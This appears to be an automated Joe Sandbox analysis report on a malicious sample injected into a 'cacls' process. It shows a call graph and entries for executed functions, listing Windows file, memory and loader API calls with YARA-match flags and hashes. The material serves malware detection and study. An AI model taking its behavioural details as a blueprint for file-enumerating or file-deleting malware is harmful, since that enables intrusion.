RtlFreeHeap 101584->101585 101587 2751f11 101585->101587 101586->101583 101586->101584 101588 2751f41 101586->101588 101589 275b960 RtlFreeHeap 101588->101589 101589->101583 101590 27504a0 101591 27504c3 101590->101591 101592 2744890 LdrLoadDll 101591->101592 101593 27504e7 101592->101593 101594 2759560 101595 2759592 101594->101595 101596 275961a 101594->101596 101597 2759630 NtCreateFile 101596->101597 101598 2749f63 101599 2749f6f 101598->101599 101600 2749f76 101599->101600 101601 275b960 RtlFreeHeap 101599->101601 101601->101600 101602 2739e50 101603 273a0d2 101602->101603 101605 273a5a3 101603->101605 101606 275b5a0 101603->101606 101607 275b5c4 101606->101607 101612 2734060 101607->101612 101609 275b61c 101609->101605 101610 275b5e3 101610->101609 101615 27559a0 101610->101615 101619 2743540 101612->101619 101614 273406d 101614->101610 101616 2755a01 101615->101616 101618 2755a0e 101616->101618 101655 2741ce0 101616->101655 101618->101609 101621 274355d 101619->101621 101620 2743576 101620->101614 101621->101620 101626 275a2b0 101621->101626 101623 27435d1 101623->101620 101633 2756100 101623->101633 101625 2743622 101625->101614 101628 275a2ca 101626->101628 101627 275a2f9 101627->101623 101628->101627 101629 2758ea0 LdrInitializeThunk 101628->101629 101630 275a359 101629->101630 101631 275b960 RtlFreeHeap 101630->101631 101632 275a372 101631->101632 101632->101623 101634 2756165 101633->101634 101635 2756190 101634->101635 101638 27431b0 101634->101638 101635->101625 101637 2756172 101637->101625 101640 27431be 101638->101640 101639 274319c 101639->101637 101640->101639 101644 27480d0 101640->101644 101643 2759870 NtClose 101643->101639 101645 2743443 101644->101645 101646 27480ea 101644->101646 101645->101639 101645->101643 101650 2758f40 101646->101650 101649 2759870 NtClose 101649->101645 101651 2758f5a 101650->101651 101654 31c35c0 LdrInitializeThunk 101651->101654 101652 27481ba 101652->101649 101654->101652 101656 2741d1b 101655->101656 101671 27481e0 101656->101671 101658 2741d23 101659 275ba40 RtlAllocateHeap 101658->101659 101670 2742006 101658->101670 101660 2741d39 101659->101660 101661 275ba40 RtlAllocateHeap 101660->101661 101662 2741d4a 101661->101662 101663 275ba40 RtlAllocateHeap 101662->101663 101664 2741d5b 101663->101664 101666 2741df2 101664->101666 101686 2746d70 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 101664->101686 101667 2744890 LdrLoadDll 101666->101667 101668 2741fb2 101667->101668 101682 27582e0 101668->101682 101670->101618 101672 274820c 101671->101672 101673 27480d0 2 API calls 101672->101673 101674 274822f 101673->101674 101675 2748251 101674->101675 101676 2748239 101674->101676 101677 274826d 101675->101677 101680 2759870 NtClose 101675->101680 101678 2748244 101676->101678 101679 2759870 NtClose 101676->101679 101677->101658 101678->101658 101679->101678 101681 2748263 101680->101681 101681->101658 101683 2758342 101682->101683 101685 275834f 101683->101685 101687 2742020 101683->101687 101685->101670 101686->101666 101703 27484b0 101687->101703 101689 2742040 101698 27425a3 101689->101698 101707 27514d0 101689->101707 101692 2742254 101694 275cb30 2 API calls 101692->101694 101693 274209e 101693->101698 101710 275ca00 101693->101710 101695 2742269 101694->101695 101696 27422b9 101695->101696 101715 2740b20 101695->101715 101697 2748450 LdrInitializeThunk 101696->101697 101696->101698 101700 2740b20 LdrInitializeThunk 101696->101700 101697->101696 101698->101685 101700->101696 101701 2742413 101701->101696 101702 2748450 LdrInitializeThunk 101701->101702 101702->101701 101704 27484bd 101703->101704 101705 27484e5 101704->101705 101706 27484de SetErrorMode 101704->101706 101705->101689 101706->101705 101708 275b8d0 NtAllocateVirtualMemory 101707->101708 101709 27514f1 101708->101709 101709->101693 101711 275ca16 101710->101711 101712 275ca10 101710->101712 101713 275ba40 RtlAllocateHeap 101711->101713 101712->101692 101714 275ca3c 101713->101714 101714->101692 101716 2740b3d 101715->101716 101719 2759af0 101716->101719 101720 2759b0d 101719->101720 101723 31c2c70 LdrInitializeThunk 101720->101723 101721 2740b42 101721->101701 101723->101721 101724 274b090 101729 274ada0 101724->101729 101726 274b09d 101743 274aa20 101726->101743 101728 274b0b9 101730 274adc5 101729->101730 101754 27486c0 101730->101754 101733 274af13 101733->101726 101735 274af2a 101735->101726 101736 274af21 101736->101735 101738 274b017 101736->101738 101773 274a470 101736->101773 101739 274b07a 101738->101739 101782 274a7e0 101738->101782 101741 275b960 RtlFreeHeap 101739->101741 101742 274b081 101741->101742 101742->101726 101744 274aa36 101743->101744 101747 274aa41 101743->101747 101745 275ba40 RtlAllocateHeap 101744->101745 101745->101747 101746 274aa62 101746->101728 101747->101746 101748 27486c0 GetFileAttributesW 101747->101748 101749 274ad72 101747->101749 101752 274a470 RtlFreeHeap 101747->101752 101753 274a7e0 RtlFreeHeap 101747->101753 101748->101747 101750 274ad8b 101749->101750 101751 275b960 RtlFreeHeap 101749->101751 101750->101728 101751->101750 101752->101747 101753->101747 101755 27486e1 101754->101755 101756 27486f3 101755->101756 101757 27486e8 GetFileAttributesW 101755->101757 101756->101733 101758 27536f0 101756->101758 101757->101756 101759 27536fe 101758->101759 101760 2753705 101758->101760 101759->101736 101761 2744890 LdrLoadDll 101760->101761 101762 275373a 101761->101762 101763 2753749 101762->101763 101786 27531b0 LdrLoadDll 101762->101786 101765 275ba40 RtlAllocateHeap 101763->101765 101769 27538f4 101763->101769 101766 2753762 101765->101766 101767 27538ea 101766->101767 101766->101769 101770 275377e 101766->101770 101768 275b960 RtlFreeHeap 101767->101768 101767->101769 101768->101769 101769->101736 101770->101769 101771 275b960 RtlFreeHeap 101770->101771 101772 27538de 101771->101772 101772->101736 101774 274a496 101773->101774 101787 274deb0 101774->101787 101776 274a508 101778 274a526 101776->101778 101779 274a690 101776->101779 101777 274a675 101777->101736 101778->101777 101792 274a330 101778->101792 101779->101777 101780 274a330 RtlFreeHeap 101779->101780 101780->101779 101783 274a806 101782->101783 101784 274deb0 RtlFreeHeap 101783->101784 101785 274a88d 101784->101785 101785->101738 101786->101763 101789 274decf 101787->101789 101788 274dee1 101788->101776 101789->101788 101790 275b960 RtlFreeHeap 101789->101790 101791 274df24 101790->101791 101791->101776 101793 274a34d 101792->101793 101796 274df40 101793->101796 101795 274a453 101795->101778 101797 274df64 101796->101797 101798 274e00e 101797->101798 101799 275b960 RtlFreeHeap 101797->101799 101798->101795 101799->101798 101800 2758e50 101801 2758e6a 101800->101801 101804 31c2df0 LdrInitializeThunk 101801->101804 101802 2758e92 101804->101802 101805 2756410 101806 275646a 101805->101806 101808 2756477 101806->101808 101809 2753e10 101806->101809 101810 275b8d0 NtAllocateVirtualMemory 101809->101810 101812 2753e51 101810->101812 101811 2753f5e 101811->101808 101812->101811 101813 2744890 LdrLoadDll 101812->101813 101815 2753e97 101813->101815 101814 2753ee0 Sleep 101814->101815 101815->101811 101815->101814 101816 27596d0 101817 275977a 101816->101817 101819 27596fe 101816->101819 101818 2759790 NtReadFile 101817->101818 101820 2758cd0 101821 2758cfb 101820->101821 101822 2758d5f 101820->101822 101825 31c2ee0 LdrInitializeThunk 101822->101825 101823 2758d90 101825->101823 101826 2751b10 101827 2751b2c 101826->101827 101828 2751b54 101827->101828 101829 2751b68 101827->101829 101831 2759870 NtClose 101828->101831 101830 2759870 NtClose 101829->101830 101832 2751b71 101830->101832 101833 2751b5d 101831->101833 101836 275ba80 RtlAllocateHeap 101832->101836 101835 2751b7c 101836->101835 101837 27597d0 101838 2759847 101837->101838 101840 27597fb 101837->101840 101839 275985d NtDeleteFile 101838->101839 101842 274715a 101843 274712c 101842->101843 101845 274715f 101842->101845 101847 2748280 101843->101847 101846 2747134 101848 274829d 101847->101848 101854 2758f90 101848->101854 101850 27482ed 101851 27482f4 101850->101851 101852 2759070 LdrInitializeThunk 101850->101852 101851->101846 101853 274831d 101852->101853 101853->101846 101855 275902e 101854->101855 101857 2758fbe 101854->101857 101859 31c2f30 LdrInitializeThunk 101855->101859 101856 2759067 101856->101850 101857->101850 101859->101856 101860 2747480 101861 274749c 101860->101861 101862 27474ef 101860->101862 101861->101862 101863 2759870 NtClose 101861->101863 101864 2747627 101862->101864 101871 27468a0 NtClose LdrInitializeThunk LdrInitializeThunk 101862->101871 101865 27474b7 101863->101865 101870 27468a0 NtClose LdrInitializeThunk LdrInitializeThunk 101865->101870 101868 2747601 101868->101864 101872 2746a70 NtClose LdrInitializeThunk LdrInitializeThunk 101868->101872 101870->101862 101871->101868 101872->101864 101873 274c940 101875 274c969 101873->101875 101874 274ca6d 101875->101874 101876 274ca13 FindFirstFileW 101875->101876 101876->101874 101878 274ca2e 101876->101878 101877 274ca54 FindNextFileW 101877->101878 101879 274ca66 FindClose 101877->101879 101878->101877 101879->101874 101880 2745f00 101881 2748450 LdrInitializeThunk 101880->101881 101882 2745f30 101880->101882 101881->101882 101884 2745f5c 101882->101884 101885 27483d0 101882->101885 101886 2748414 101885->101886 101891 2748435 101886->101891 101892 2758b70 101886->101892 101888 2748425 101889 2748441 101888->101889 101890 2759870 NtClose 101888->101890 101889->101882 101890->101891 101891->101882 101893 2758bf0 101892->101893 101894 2758b9e 101892->101894 101897 31c4650 LdrInitializeThunk 101893->101897 101894->101888 101895 2758c15 101895->101888 101897->101895 101898 275b640 101899 275b64b 101898->101899 101901 275b66a 101899->101901 101902 2755e90 101899->101902 101903 2755ef2 101902->101903 101905 2755eff 101903->101905 101906 2742620 101903->101906 101905->101901 101910 27425e6 101906->101910 101907 2758ea0 LdrInitializeThunk 101908 27425f2 101907->101908 101912 2759900 101908->101912 101910->101907 101910->101908 101911 274260b 101910->101911 101911->101905 101913 275998f 101912->101913 101915 275992b 101912->101915 101917 31c2e80 LdrInitializeThunk 101913->101917 101914 27599c0 101914->101911 101915->101911 101917->101914 101918 2745f83 101919 2745f36 101918->101919 101922 2745f8c 101918->101922 101920 27483d0 2 API calls 101919->101920 101921 2745f5c 101919->101921 101920->101919 101923 2742a8c 101924 2742ab8 101923->101924 101925 2746610 2 API calls 101924->101925 101926 2742ac3 101925->101926

                                                          Executed Functions

                                                          Function 0274C940 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindFirstFileW.KERNELBASE(?,00000000), ref: 0274CA24
                                                          • FindNextFileW.KERNELBASE(?,00000010), ref: 0274CA5F
                                                          • FindClose.KERNELBASE(?), ref: 0274CA6A
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3923788481.0000000002730000.00000040.80000000.00040000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2730000_cacls.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Find$File$CloseFirstNext
                                                          • String ID:
                                                          • API String ID: 3541575487-0
                                                          • Opcode ID: 9d27a8dcd305fc1bab0a29c7ea9d517702547bd46d60a9d6759da10dfb66ff6c
                                                          • Instruction ID: 6dc38793170c83d5f63029584e217ac379eb16aa91218d2df1bd1fa6e0be64fa
                                                          • Opcode Fuzzy Hash: 9d27a8dcd305fc1bab0a29c7ea9d517702547bd46d60a9d6759da10dfb66ff6c
                                                          • Instruction Fuzzy Hash: 1A316371A003187BDB22DFA0CC89FEF777D9B44745F14455DB949A6180DB70AB848BA4
                                                          Function 02759560 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtCreateFile.NTDLL(?,?,?,C3714B7A,?,?,?,?,?,?,?), ref: 02759661
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3923788481.0000000002730000.00000040.80000000.00040000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2730000_cacls.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: e3c55a6a012d0c960e2372c45c7d93e030ed8fa0c9b77380962c01b5fbf43196
                                                          • Instruction ID: 15a9b6f4ee9720a060554263dcc2f158dd4899a608555fdee55a5644bb76e2f3
                                                          • Opcode Fuzzy Hash: e3c55a6a012d0c960e2372c45c7d93e030ed8fa0c9b77380962c01b5fbf43196
                                                          • Instruction Fuzzy Hash: 5C31C0B5A01248ABDB14DF98D880EEFB7F9AF8C304F108219FD19A7240D770A951CFA4
                                                          Function 027596D0 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtReadFile.NTDLL(?,?,?,C3714B7A,?,?,?,?,?), ref: 027597B9
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3923788481.0000000002730000.00000040.80000000.00040000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2730000_cacls.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          • Opcode ID: d26101aeaaa043df99420354c37e34887d72040b686b126e709cff6c41da8d29
                                                          • Instruction ID: e8fca113e16331ab608790307a1ab7e31885a717962ee14bed1a3fb4527be80d
                                                          • Opcode Fuzzy Hash: d26101aeaaa043df99420354c37e34887d72040b686b126e709cff6c41da8d29
                                                          • Instruction Fuzzy Hash: D431E3B5A00208AFDB14DF98D880EEFB7F9EF88314F108219FD19A7240D770A9118FA5
                                                          Function 027599D0 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtAllocateVirtualMemory.NTDLL(0274209E,?,0275834F,C3714B7A,00000004,00003000,?,?,?,?,?,0275834F,0274209E,0275B901,0275834F,520F8B51), ref: 02759A98
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3923788481.0000000002730000.00000040.80000000.00040000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2730000_cacls.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateMemoryVirtual
                                                          • String ID:
                                                          • API String ID: 2167126740-0
                                                          • Opcode ID: ce89629044f2441d048d03dcdc22383d650bc2c2de4880009a5b8edf100d122a
                                                          • Instruction ID: 2c5afb9f3d524424e5c4c892d8312952e02a481b2e74f50f0581e58736c8d468
                                                          • Opcode Fuzzy Hash: ce89629044f2441d048d03dcdc22383d650bc2c2de4880009a5b8edf100d122a
                                                          • Instruction Fuzzy Hash: 1C2108B5A00608ABDB10DF98DC45EEFB7B9EF88710F108219FD19A7240D770A9118BA5
                                                          Function 027597D0 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3923788481.0000000002730000.00000040.80000000.00040000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2730000_cacls.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DeleteFile
                                                          • String ID:
                                                          • API String ID: 4033686569-0
                                                          • Opcode ID: 954619f73f159c906b658b08830aa2f3d9ebf4970ffdbfa5db3952952fb91dc1
                                                          • Instruction ID: f4819844f346beb9b50456663c80152e7eccdaf2c292b2d464f97f8b69114885
                                                          • Opcode Fuzzy Hash: 954619f73f159c906b658b08830aa2f3d9ebf4970ffdbfa5db3952952fb91dc1
                                                          • Instruction Fuzzy Hash: 8F11C1316002186BD321EAA4CC05FEBB7ADDF84314F108108FA0956180E7B07A158BE5
                                                          Function 02759870 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtClose.NTDLL(?,02743443,001F0001,?,00000000,?,?,00000104), ref: 027598A4
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3923788481.0000000002730000.00000040.80000000.00040000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2730000_cacls.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID:
                                                          • API String ID: 3535843008-0
                                                          • Opcode ID: 1ccfb7074c235d79d87762803b7bffdee7b431a73409e616f994fa16c9a62f17
                                                          • Instruction ID: fa4ae1e8855e3d9e6f5315767e67d5f40dd8bbdf1905e963b464f9a3a31885a0
                                                          • Opcode Fuzzy Hash: 1ccfb7074c235d79d87762803b7bffdee7b431a73409e616f994fa16c9a62f17
                                                          • Instruction Fuzzy Hash: E5E046362102187BC220AA69DC00FDBB7ADEBC5760F408415FA08A7241CAB0BA418BE4
                                                          Function 031C4340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3925432406.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                          • Associated: 00000007.00000002.3925432406.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_3150000_cacls.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: dcc3a6211633955e45183153744fbb28bbac6a73d69ed7ed7d35dabb39382c0b
                                                          • Instruction ID: bd9742e2fc67e34adbc1c1a2e83220dc8db4b834a0628383fe84bfaae087893a
                                                          • Opcode Fuzzy Hash: dcc3a6211633955e45183153744fbb28bbac6a73d69ed7ed7d35dabb39382c0b
                                                          • Instruction Fuzzy Hash: B7900435705C1413D140F15C4DC45474015D7F5301F55D011F0435554CCF14CF575371
                                                          Function 031C4650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3925432406.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                          • Associated: 00000007.00000002.3925432406.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_3150000_cacls.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: b4af7eca0c666d611a6dcfe508d32024548c4d5a301d02c098c5ff1db88a1fa6
                                                          • Instruction ID: 04b237cfa3507a65d258a47c407e09856e8bf1af0d5d54983d49b21d151b42a8
                                                          • Opcode Fuzzy Hash: b4af7eca0c666d611a6dcfe508d32024548c4d5a301d02c098c5ff1db88a1fa6
                                                          • Instruction Fuzzy Hash: 70900475701514434140F15C4D044077015D7F73013D5D115F0555570CC71CCD55D37D
                                                          Function 031C2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3925432406.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                          • Associated: 00000007.00000002.3925432406.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_3150000_cacls.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 9c71cab96b2e0d59a912d9fd6261f6c1245e08e1dc2d77c3a99f7c1f0282983a
                                                          • Instruction ID: e7a402bf1a4e7ac925da0f297bc96bae860b3c867bd0c0a6bd33e4d30c0f55ca
                                                          • Opcode Fuzzy Hash: 9c71cab96b2e0d59a912d9fd6261f6c1245e08e1dc2d77c3a99f7c1f0282983a
                                                          • Instruction Fuzzy Hash: FC900475303414034105F15C4514717401FC7F5301F55D031F10155D0DC735CDD17135
                                                          Function 031C2BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3925432406.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                          • Associated: 00000007.00000002.3925432406.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_3150000_cacls.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 07808b4ce79aa1e3f448c23b3d57448c26f39308c6906b7fc2f28fa4a1cd4b15
                                                          • Instruction ID: 117540f6f40726095525a8b1b6b1330f66fd1adde0d577cdafd05aed1de6e98c
                                                          • Opcode Fuzzy Hash: 07808b4ce79aa1e3f448c23b3d57448c26f39308c6906b7fc2f28fa4a1cd4b15
                                                          • Instruction Fuzzy Hash: C990043570541C03D150F15C45147470015C7D5301F55D011F0035754DC755CF5577F1
                                                          Function 031C2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3925432406.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                          • Associated: 00000007.00000002.3925432406.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_3150000_cacls.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 95e49b31d5b640590416125a1addc19d7ca87b8f3b9eaae6fcd37f1764eef324
                                                          • Instruction ID: c727284fb4da95a6c6fbc125544caa9cb5caf83feffa9220b40f30243aea4a9d
                                                          • Opcode Fuzzy Hash: 95e49b31d5b640590416125a1addc19d7ca87b8f3b9eaae6fcd37f1764eef324
                                                          • Instruction Fuzzy Hash: 2290023520141C03D180B158450464A001587D6301F95D015A0026654DCB158B5977A1
                                                          Function 031C2BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3925432406.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                          • Associated: 00000007.00000002.3925432406.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_3150000_cacls.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 4b6f0c573f2bae13e96d048884a819c215010f2517f880c39ebf12776def0e93
                                                          • Instruction ID: e7a4138c4e946f357f521cb666ad2012c87d0de22a9ba5047d80ce4c2b340273
                                                          • Opcode Fuzzy Hash: 4b6f0c573f2bae13e96d048884a819c215010f2517f880c39ebf12776def0e93
                                                          • Instruction Fuzzy Hash: F790023520545C43D140B1584504A46002587D5305F55D011A0065694D97258E55B661
                                                          Function 031C2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3925432406.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                          • Associated: 00000007.00000002.3925432406.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_3150000_cacls.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 4a09c4a2a5d70ee0b5d16be39943252ccc7a3b1ad2eda8179e3fa1bb8ae1d151
                                                          • Instruction ID: bd742ce567c8efabb31ee40d4d369214b0ea0b9c9bdf1fc8362080560cc32505
                                                          • Opcode Fuzzy Hash: 4a09c4a2a5d70ee0b5d16be39943252ccc7a3b1ad2eda8179e3fa1bb8ae1d151
                                                          • Instruction Fuzzy Hash: 7090043D311414030105F55C07045070057C7DF351355D031F1017550CD731CD715131
                                                          Function 031C2AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3925432406.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                          • Associated: 00000007.00000002.3925432406.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_3150000_cacls.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: cb2bbebd61552d2a1989f5ed05b9ac66488a427ec3f1afc8f32db070e62136a8
                                                          • Instruction ID: 76b1d66953536119d70d75daaeb0a9b5d7d1018e43691128ee4f09ba2765e458
                                                          • Opcode Fuzzy Hash: cb2bbebd61552d2a1989f5ed05b9ac66488a427ec3f1afc8f32db070e62136a8
                                                          • Instruction Fuzzy Hash: 97900229221414030145F558070450B045597DB351395D015F1417590CC72189655321
                                                          Function 031C2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3925432406.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                          • Associated: 00000007.00000002.3925432406.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_3150000_cacls.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 217adcf7055134956bc526a5a145c971c105b78ea17795600db5efec25fef065
                                                          • Instruction ID: 9796a762a114b29f894d7ed4a52075e2fd65000e024be505c92636745570a48c
                                                          • Opcode Fuzzy Hash: 217adcf7055134956bc526a5a145c971c105b78ea17795600db5efec25fef065
                                                          • Instruction Fuzzy Hash: AB90026534141843D100B1584514B060015C7E6301F55D015E1065554D8719CD526126
                                                          Function 031C2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.3925432406.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                          • Associated: 00000007.00000002.3925432406.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.3925432406.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_3150000_cacls.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 3cdefb44b930a5786b3a915773a42cb43e689fa73bd34705924edb80db713024
                                                          • Instruction ID: 2c319763b63f2107ed689a0be8ff83a925b6b9f39817f700f96ec79558563c10
                                                          • Opcode Fuzzy Hash: 3cdefb44b930a5786b3a915773a42cb43e689fa73bd34705924edb80db713024
                                                          • Instruction Fuzzy Hash: 68900225601414434140B16889449064015ABE6211755D121A0999550D875989655665
                                                          Function 031C2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
